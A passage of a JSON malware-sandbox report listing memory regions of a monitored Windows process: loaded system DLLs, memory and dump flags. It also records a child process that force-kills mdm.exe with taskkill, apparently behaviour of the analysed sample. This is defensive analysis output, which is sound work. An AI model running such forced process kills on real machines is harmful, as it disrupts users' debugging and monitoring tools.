"c:\\windows\\syswow64\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 1967063040, "timestamp": "00:01:25.824", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1967128576, "type": "region", "version": 1 }, "end_va": 1967521791, "entry_point": 1967236019, "filename": "\\Windows\\SysWOW64\\sspicli.dll", "id": "region_3087", "name": "sspicli.dll", "norm_filename": "c:\\windows\\syswow64\\sspicli.dll", "region_type": "memory_mapped_file", "start_va": 1967128576, "timestamp": "00:01:25.824", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1968832512, "type": "region", "version": 1 }, "end_va": 1969537023, "entry_point": 1968874610, "filename": "\\Windows\\SysWOW64\\msvcrt.dll", "id": "region_3088", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\syswow64\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1968832512, "timestamp": "00:01:25.825", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 1983840256, "type": "region", "version": 1 }, "end_va": 1984495615, "entry_point": 1983924709, "filename": "\\Windows\\SysWOW64\\advapi32.dll", "id": "region_3089", "name": "advapi32.dll", "norm_filename": "c:\\windows\\syswow64\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 1983840256, "timestamp": "00:01:25.825", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1114112, "start_va": 1985085440, "type": "region", "version": 1 }, "end_va": 1986199551, "entry_point": 1985163987, "filename": "\\Windows\\SysWOW64\\kernel32.dll", "id": "region_3090", "name": "kernel32.dll", "norm_filename": "c:\\windows\\syswow64\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1985085440, "timestamp": "00:01:25.826", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 983040, "start_va": 1986592768, "type": "region", "version": 1 }, "end_va": 1987575807, "entry_point": 1986659689, "filename": "\\Windows\\SysWOW64\\rpcrt4.dll", "id": "region_3091", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\syswow64\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1986592768, "timestamp": "00:01:25.826", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 1987575808, "type": "region", "version": 1 }, "end_va": 1987932159, "entry_point": 1987681190, "filename": "\\Windows\\SysWOW64\\shlwapi.dll", "id": "region_3092", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\syswow64\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 1987575808, "timestamp": "00:01:25.826", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 585728, "start_va": 1989214208, "type": "region", "version": 1 }, "end_va": 1989799935, "entry_point": 1989230513, "filename": "\\Windows\\SysWOW64\\oleaut32.dll", "id": "region_3093", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\syswow64\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 1989214208, "timestamp": "00:01:25.827", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1989804032, "type": "region", "version": 1 }, "end_va": 1989906431, "entry_point": 1989822837, "filename": "\\Windows\\SysWOW64\\sechost.dll", "id": "region_3094", "name": "sechost.dll", "norm_filename": "c:\\windows\\syswow64\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1989804032, "timestamp": "00:01:25.827", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 24576, "start_va": 1992818688, "type": "region", "version": 1 }, "end_va": 1992843263, "entry_point": 1992824706, "filename": "\\Windows\\SysWOW64\\nsi.dll", "id": "region_3095", "name": "nsi.dll", "norm_filename": "c:\\windows\\syswow64\\nsi.dll", "region_type": "memory_mapped_file", "start_va": 1992818688, "timestamp": "00:01:25.828", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1992884224, "type": "region", "version": 1 }, "end_va": 1993527295, "entry_point": 1993097175, "filename": "\\Windows\\SysWOW64\\usp10.dll", "id": "region_3096", "name": "usp10.dll", "norm_filename": "c:\\windows\\syswow64\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1992884224, "timestamp": "00:01:25.828", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1425408, "start_va": 1993539584, "type": "region", "version": 1 }, "end_va": 1994964991, "entry_point": 1993849405, "filename": "\\Windows\\SysWOW64\\ole32.dll", "id": "region_3097", "name": "ole32.dll", "norm_filename": "c:\\windows\\syswow64\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 1993539584, "timestamp": "00:01:25.829", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1995046912, "type": "region", "version": 1 }, "end_va": 1995087871, "entry_point": 1995060896, "filename": "\\Windows\\SysWOW64\\lpk.dll", "id": "region_3098", "name": "lpk.dll", "norm_filename": "c:\\windows\\syswow64\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1995046912, "timestamp": "00:01:25.829", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 217088, "start_va": 1997733888, "type": "region", "version": 1 }, "end_va": 1997950975, "entry_point": 1997739101, "filename": "\\Windows\\SysWOW64\\ws2_32.dll", "id": "region_3099", "name": "ws2_32.dll", "norm_filename": "c:\\windows\\syswow64\\ws2_32.dll", "region_type": "memory_mapped_file", "start_va": 1997733888, "timestamp": "00:01:25.829", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 286720, "start_va": 1999372288, "type": "region", "version": 1 }, "end_va": 1999659007, "entry_point": 1999402104, "filename": "\\Windows\\SysWOW64\\KernelBase.dll", "id": "region_3100", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\syswow64\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1999372288, "timestamp": "00:01:25.830", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1048576, "start_va": 1999699968, "type": "region", "version": 1 }, "end_va": 2000748543, "entry_point": 1999812333, "filename": "\\Windows\\SysWOW64\\user32.dll", "id": "region_3101", "name": "user32.dll", "norm_filename": "c:\\windows\\syswow64\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1999699968, "timestamp": "00:01:25.830", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 589824, "start_va": 2000748544, "type": "region", "version": 1 }, "end_va": 2001338367, "entry_point": 2000839491, "filename": "\\Windows\\SysWOW64\\gdi32.dll", "id": "region_3102", "name": "gdi32.dll", "norm_filename": "c:\\windows\\syswow64\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 2000748544, "timestamp": "00:01:25.831", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_3103", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:01:25.831", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 15728640, "start_va": 2131623936, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_3104", "name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:01:25.832", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1605632, "start_va": 4194304, "type": "region", "version": 1 }, "end_va": 5799935, "entry_point": 0, "filename": null, "id": "region_3105", "name": "pagefile_0x0000000000400000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4194304, "timestamp": "00:01:25.835", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1987969024, "type": "region", "version": 1 }, "end_va": 1988362239, "entry_point": 1988040079, "filename": "\\Windows\\SysWOW64\\imm32.dll", "id": "region_3106", "name": "imm32.dll", "norm_filename": "c:\\windows\\syswow64\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 1987969024, "timestamp": "00:01:25.835", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1998520320, "type": "region", "version": 1 }, "end_va": 1999355903, "entry_point": 1998526091, "filename": "\\Windows\\SysWOW64\\msctf.dll", "id": "region_3107", "name": "msctf.dll", "norm_filename": "c:\\windows\\syswow64\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1998520320, "timestamp": "00:01:25.836", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 225279, "entry_point": 0, "filename": null, "id": "region_3108", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:01:26.031", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 458752, "type": "region", "version": 1 }, "end_va": 466943, "entry_point": 0, "filename": null, "id": "region_3109", "name": "pagefile_0x0000000000070000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 458752, "timestamp": "00:01:26.031", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 16384, "start_va": 524288, "type": "region", "version": 1 }, "end_va": 540671, "entry_point": 524288, "filename": "\\Windows\\SysWOW64\\en-US\\taskkill.exe.mui", "id": "region_3110", "name": "taskkill.exe.mui", "norm_filename": "c:\\windows\\syswow64\\en-us\\taskkill.exe.mui", "region_type": "memory_mapped_file", "start_va": 524288, "timestamp": "00:01:26.031", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 851968, "type": "region", "version": 1 }, "end_va": 856063, "entry_point": 0, "filename": null, "id": "region_3111", "name": "private_0x00000000000d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 851968, "timestamp": "00:01:26.032", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 1638400, "type": "region", "version": 1 }, "end_va": 1642495, "entry_point": 0, "filename": null, "id": "region_3112", "name": "private_0x0000000000190000", "norm_filename": null, "region_type": "private_memory", "start_va": 1638400, "timestamp": "00:01:26.032", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 1703936, "type": "region", "version": 1 }, "end_va": 1708031, "entry_point": 0, "filename": null, "id": "region_3113", "name": "pagefile_0x00000000001a0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1703936, "timestamp": "00:01:26.032", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 2818048, "type": "region", "version": 1 }, "end_va": 3080191, "entry_point": 0, "filename": null, "id": "region_3114", "name": "private_0x00000000002b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2818048, "timestamp": "00:01:26.032", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1576960, "start_va": 6094848, "type": "region", "version": 1 }, "end_va": 7671807, "entry_point": 0, "filename": null, "id": "region_3115", "name": "pagefile_0x00000000005d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 6094848, "timestamp": "00:01:26.032", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20971520, "start_va": 8126464, "type": "region", "version": 1 }, "end_va": 29097983, "entry_point": 0, "filename": null, "id": "region_3116", "name": "pagefile_0x00000000007c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 8126464, "timestamp": "00:01:26.032", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 786432, "start_va": 29097984, "type": "region", "version": 1 }, "end_va": 29884415, "entry_point": 29097984, "filename": "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui", "id": "region_3117", "name": "kernelbase.dll.mui", "norm_filename": "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui", "region_type": "memory_mapped_file", "start_va": 29097984, "timestamp": "00:01:26.032", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 30277632, "type": "region", "version": 1 }, "end_va": 30539775, "entry_point": 0, "filename": null, "id": "region_3118", "name": "private_0x0000000001ce0000", "norm_filename": null, "region_type": "private_memory", "start_va": 30277632, "timestamp": "00:01:26.033", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 30867456, "type": "region", "version": 1 }, "end_va": 31129599, "entry_point": 0, "filename": null, "id": "region_3119", "name": "private_0x0000000001d70000", "norm_filename": null, "region_type": "private_memory", "start_va": 30867456, "timestamp": "00:01:26.033", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 536576, "start_va": 1984495616, "type": "region", "version": 1 }, "end_va": 1985032191, "entry_point": 1984504786, "filename": "\\Windows\\SysWOW64\\clbcatq.dll", "id": "region_3120", "name": "clbcatq.dll", "norm_filename": "c:\\windows\\syswow64\\clbcatq.dll", "region_type": "memory_mapped_file", "start_va": 1984495616, "timestamp": "00:01:26.033", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130542592, "type": "region", "version": 1 }, "end_va": 2130554879, "entry_point": 0, "filename": null, "id": "region_3121", "name": "private_0x000000007efd8000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130542592, "timestamp": "00:01:26.034", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 1769472, "type": "region", "version": 1 }, "end_va": 1773567, "entry_point": 0, "filename": null, "id": "region_3122", "name": "pagefile_0x00000000001b0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1769472, "timestamp": "00:01:26.039", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 376832, "start_va": 1784152064, "type": "region", "version": 1 }, "end_va": 1784528895, "entry_point": 1784294216, "filename": "\\Windows\\SysWOW64\\wbemcomn.dll", "id": "region_3123", "name": "wbemcomn.dll", "norm_filename": "c:\\windows\\syswow64\\wbemcomn.dll", "region_type": "memory_mapped_file", "start_va": 1784152064, "timestamp": "00:01:26.039", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1785856000, "type": "region", "version": 1 }, "end_va": 1785896959, "entry_point": 1785861274, "filename": "\\Windows\\SysWOW64\\wbem\\wbemprox.dll", "id": "region_3124", "name": "wbemprox.dll", "norm_filename": "c:\\windows\\syswow64\\wbem\\wbemprox.dll", "region_type": "memory_mapped_file", "start_va": 1785856000, "timestamp": "00:01:26.039", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 31326208, "type": "region", "version": 1 }, "end_va": 31588351, "entry_point": 0, "filename": null, "id": "region_3125", "name": "private_0x0000000001de0000", "norm_filename": null, "region_type": "private_memory", "start_va": 31326208, "timestamp": "00:01:26.043", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 31588352, "type": "region", "version": 1 }, "end_va": 32636927, "entry_point": 0, "filename": null, "id": "region_3126", "name": "private_0x0000000001e20000", "norm_filename": null, "region_type": "private_memory", "start_va": 31588352, "timestamp": "00:01:26.043", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 167936, "start_va": 1783955456, "type": "region", "version": 1 }, "end_va": 1784123391, "entry_point": 1783982873, "filename": "\\Windows\\SysWOW64\\winsta.dll", "id": "region_3127", "name": "winsta.dll", "norm_filename": "c:\\windows\\syswow64\\winsta.dll", "region_type": "memory_mapped_file", "start_va": 1783955456, "timestamp": "00:01:26.043", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 29884416, "type": "region", "version": 1 }, "end_va": 30146559, "entry_point": 0, "filename": null, "id": "region_3128", "name": "private_0x0000000001c80000", "norm_filename": null, "region_type": "private_memory", "start_va": 29884416, "timestamp": "00:01:26.056", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 32636928, "type": "region", "version": 1 }, "end_va": 35581951, "entry_point": 32636928, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_3129", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 32636928, "timestamp": "00:01:26.056", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 36503552, "type": "region", "version": 1 }, "end_va": 36765695, "entry_point": 0, "filename": null, "id": "region_3130", "name": "private_0x00000000022d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 36503552, "timestamp": "00:01:26.057", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 241664, "start_va": 1950744576, "type": "region", "version": 1 }, "end_va": 1950986239, "entry_point": 1950749325, "filename": "\\Windows\\SysWOW64\\rsaenh.dll", "id": "region_3131", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\syswow64\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 1950744576, "timestamp": "00:01:26.057", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 1956511744, "type": "region", "version": 1 }, "end_va": 1956601855, "entry_point": 1956523459, "filename": "\\Windows\\SysWOW64\\cryptsp.dll", "id": "region_3132", "name": "cryptsp.dll", "norm_filename": "c:\\windows\\syswow64\\cryptsp.dll", "region_type": "memory_mapped_file", "start_va": 1956511744, "timestamp": "00:01:26.058", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130530304, "type": "region", "version": 1 }, "end_va": 2130542591, "entry_point": 0, "filename": null, "id": "region_3133", "name": "private_0x000000007efd5000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130530304, "timestamp": "00:01:26.058", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 57344, "start_va": 1956446208, "type": "region", "version": 1 }, "end_va": 1956503551, "entry_point": 1956450869, "filename": "\\Windows\\SysWOW64\\RpcRtRemote.dll", "id": "region_3134", "name": "rpcrtremote.dll", "norm_filename": "c:\\windows\\syswow64\\rpcrtremote.dll", "region_type": "memory_mapped_file", "start_va": 1956446208, "timestamp": "00:01:26.060", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 2424832, "type": "region", "version": 1 }, "end_va": 2686975, "entry_point": 0, "filename": null, "id": "region_3135", "name": "private_0x0000000000250000", "norm_filename": null, "region_type": "private_memory", "start_va": 2424832, "timestamp": "00:01:26.090", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 30539776, "type": "region", "version": 1 }, "end_va": 30801919, "entry_point": 0, "filename": null, "id": "region_3136", "name": "private_0x0000000001d20000", "norm_filename": null, "region_type": "private_memory", "start_va": 30539776, "timestamp": "00:01:26.090", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 37093376, "type": "region", "version": 1 }, "end_va": 37355519, "entry_point": 0, "filename": null, "id": "region_3137", "name": "private_0x0000000002360000", "norm_filename": null, "region_type": "private_memory", "start_va": 37093376, "timestamp": "00:01:26.090", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 37355520, "type": "region", "version": 1 }, "end_va": 37617663, "entry_point": 0, "filename": null, "id": "region_3138", "name": "private_0x00000000023a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 37355520, "timestamp": "00:01:26.090", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 1785790464, "type": "region", "version": 1 }, "end_va": 1785851903, "entry_point": 1785799072, "filename": "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll", "id": "region_3139", "name": "wbemsvc.dll", "norm_filename": "c:\\windows\\syswow64\\wbem\\wbemsvc.dll", "region_type": "memory_mapped_file", "start_va": 1785790464, "timestamp": "00:01:26.090", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130354176, "type": "region", "version": 1 }, "end_va": 2130366463, "entry_point": 0, "filename": null, "id": "region_3140", "name": "private_0x000000007efaa000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130354176, "timestamp": "00:01:26.091", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130366464, "type": "region", "version": 1 }, "end_va": 2130378751, "entry_point": 0, "filename": null, "id": "region_3141", "name": "private_0x000000007efad000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130366464, "timestamp": "00:01:26.091", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 98304, "start_va": 1783169024, "type": "region", "version": 1 }, "end_va": 1783267327, "entry_point": 1783173941, "filename": "\\Windows\\SysWOW64\\ntdsapi.dll", "id": "region_3142", "name": "ntdsapi.dll", "norm_filename": "c:\\windows\\syswow64\\ntdsapi.dll", "region_type": "memory_mapped_file", "start_va": 1783169024, "timestamp": "00:01:26.097", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 614400, "start_va": 1783300096, "type": "region", "version": 1 }, "end_va": 1783914495, "entry_point": 1783429305, "filename": "\\Windows\\SysWOW64\\wbem\\fastprox.dll", "id": "region_3143", "name": "fastprox.dll", "norm_filename": "c:\\windows\\syswow64\\wbem\\fastprox.dll", "region_type": "memory_mapped_file", "start_va": 1783300096, "timestamp": "00:01:26.098", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "TASKKILL /F /IM mdm.exe /IM mdm.exe ", "filename": "c:\\windows\\syswow64\\taskkill.exe", "id": "proc_24", "image_name": "taskkill.exe", "monitor_reason": "child_process", "monitored_id": 24, "origin_monitor_id": 10, "ref_parent_process": { "ref_id": "proc_10", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_3144", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:01:26.478", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 204799, "entry_point": 0, "filename": null, "id": "region_3145", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:01:26.478", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump 